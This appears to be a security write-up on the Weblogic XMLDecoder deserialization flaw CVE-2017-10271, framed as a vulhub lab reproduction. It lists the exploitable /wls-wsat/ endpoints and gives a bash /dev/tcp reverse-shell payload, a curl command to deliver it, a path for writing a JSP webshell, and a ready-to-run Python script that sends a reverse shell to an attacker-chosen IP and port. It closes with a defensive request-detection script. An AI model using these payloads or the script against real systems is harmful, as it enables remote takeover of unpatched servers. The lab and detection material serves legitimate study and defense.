# Weblogic XMLDecoder Remote Code Execution Vulnerability CVE-2017-10271

## Vulnerability Description

Weblogic's WLS Security component exposes a webservice that uses XMLDecoder to parse XML data supplied by the user. A deserialization vulnerability is triggered during that parsing, which allows arbitrary command execution.

## Affected Versions

```
Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.0.0
Weblogic 12.2.1.2.0
```

## Environment Setup

```plain
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d
```

Visit http://xxx.xxx.xxx.xxx:7001; if the page loads normally, the environment is ready.

![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225400.png)

## Reproducing the Vulnerability

Request http://xxx.xxx.xxx.xxx:7001/wls-wsat/CoordinatorPortType. If this URL exists, the target may be vulnerable.

```plain
Other exploitable URLs
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
```

![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225406.png)

Send the following data in a POST request to obtain a reverse shell:

```xml
/bin/bash -c bash -i >& /dev/tcp/10.0.0.1/21 0>&1
```

Trigger the reverse shell with curl (save the XML data above as poc.xml):

```shell
curl -v -X POST -H "Content-Type: text/xml" --data @poc.xml "http://xxx.xxx.xxx.xxx:7001/wls-wsat/CoordinatorPortType"
```

![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225539.png)

The vulnerability can also be used to write a webshell file:

```xml
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
]]>
```

Visit http://xxx.xxx.xxx.xxx:7001/bea_wls_internal/test.jsp to reach the written file.

## Vulnerability POC

Use [weblogic-scan](https://github.com/kingkaki/weblogic-scan) for a quick check.

![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225528.png)

- Reverse shell exp

```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech

import requests


def title():
    # Banner with the supported versions and usage
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
    print('+ \033[34m公众号 : PeiQi文库 \033[0m')
    print('+ \033[34mVersion: Weblogic 10.3.6.0.0 \033[0m')
    print('+ \033[34m Weblogic 12.1.3.0.0 \033[0m')
    print('+ \033[34m Weblogic 12.2.1.0.0 \033[0m')
    print('+ \033[34m Weblogic 12.2.1.2.0 \033[0m')
    print('+ \033[36m使用格式: python3 CVE-2017-10271.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:7001 \033[0m')
    print('+ \033[36mCmd >>> shell(反弹shell) \033[0m')
    print('+------------------------------------------')


def POC_1(target_url, IP, PORT):
    # The vulnerable WLS-WSAT endpoint; the other port types listed above work the same way
    vuln_url = target_url + "/wls-wsat/CoordinatorPortType"
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    # Reverse-shell command embedded in the XML body, with the listener IP and port filled in
    data = """
/bin/bash -c bash -i >& /dev/tcp/%s/%s 0>&1
""" % (IP, PORT)
    try:
        response = requests.request("POST", url=vuln_url, headers=headers, data=data)
    except requests.RequestException:
        print("\033[31m[x] 漏洞利用失败 \033[0m")


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    IP = str(input("\033[35m请输入监听IP >>> \033[0m"))
    PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
    POC_1(target_url, IP, PORT)
```

![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225540.png)
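For the defending side, here is an added detection example that is not part of the original write-up: it flags HTTP requests that match the shape of an attempt described above, using the /wls-wsat/ port-type paths listed on this page, the POST with a text/xml body, XMLDecoder's `<java>` document root, and the two payload effects shown (a /dev/tcp reverse shell and a .jsp written under _WL_internal). The function names and the sample request records are constructed for the example.

```python
import re
from typing import Optional

# The WS-AT port types listed in this write-up; all share the same vulnerable parser.
WLS_WSAT_PATHS = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11", "/wls-wsat/RegistrationRequesterPortType11",
}

# Body indicators: java.beans.XMLDecoder's document root element, plus the two
# effects demonstrated above (reverse shell via /dev/tcp, JSP dropped in the war dir).
BODY_PATTERNS = [
    (re.compile(r"<java\b", re.I), "xmldecoder-document"),
    (re.compile(r"/dev/tcp/\S+", re.I), "reverse-shell"),
    (re.compile(r"_WL_internal/[^\s\"'<]+\.jsp", re.I), "jsp-write"),
]


def classify_request(method: str, path: str, headers: dict, body: str) -> Optional[dict]:
    """Return a finding for a request that looks like CVE-2017-10271 abuse, else None."""
    # Compare the path without its query string against the known port types.
    clean_path = path.split("?", 1)[0]
    if clean_path not in WLS_WSAT_PATHS:
        return None
    # Legitimate WS-AT traffic is also XML POSTs, so the body indicators decide.
    content_type = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    if method.upper() != "POST" or "xml" not in content_type.lower():
        return None
    hits = [name for pattern, name in BODY_PATTERNS if pattern.search(body)]
    if not hits:
        return None
    return {"path": clean_path, "indicators": hits,
            "severity": "high" if len(hits) > 1 else "medium"}


def scan(request_records):
    """Apply classify_request to (method, path, headers, body) tuples, keeping findings."""
    return [f for f in (classify_request(*r) for r in request_records) if f]


# Constructed sample records (not real traffic): a benign GET and an attack-shaped POST.
SAMPLE_REQUESTS = [
    ("GET", "/wls-wsat/CoordinatorPortType", {"Content-Type": "text/html"}, ""),
    ("POST", "/wls-wsat/CoordinatorPortType?wsdl", {"content-type": "text/xml"},
     '<java version="1.8"> /bin/bash -c bash -i >& /dev/tcp/10.0.0.1/21 0>&1 </java>'),
]
```

Run it over access-log or WAF request captures that include bodies; a `high` finding on a host in the affected version list is a strong signal of an exploitation attempt rather than ordinary WS-AT traffic.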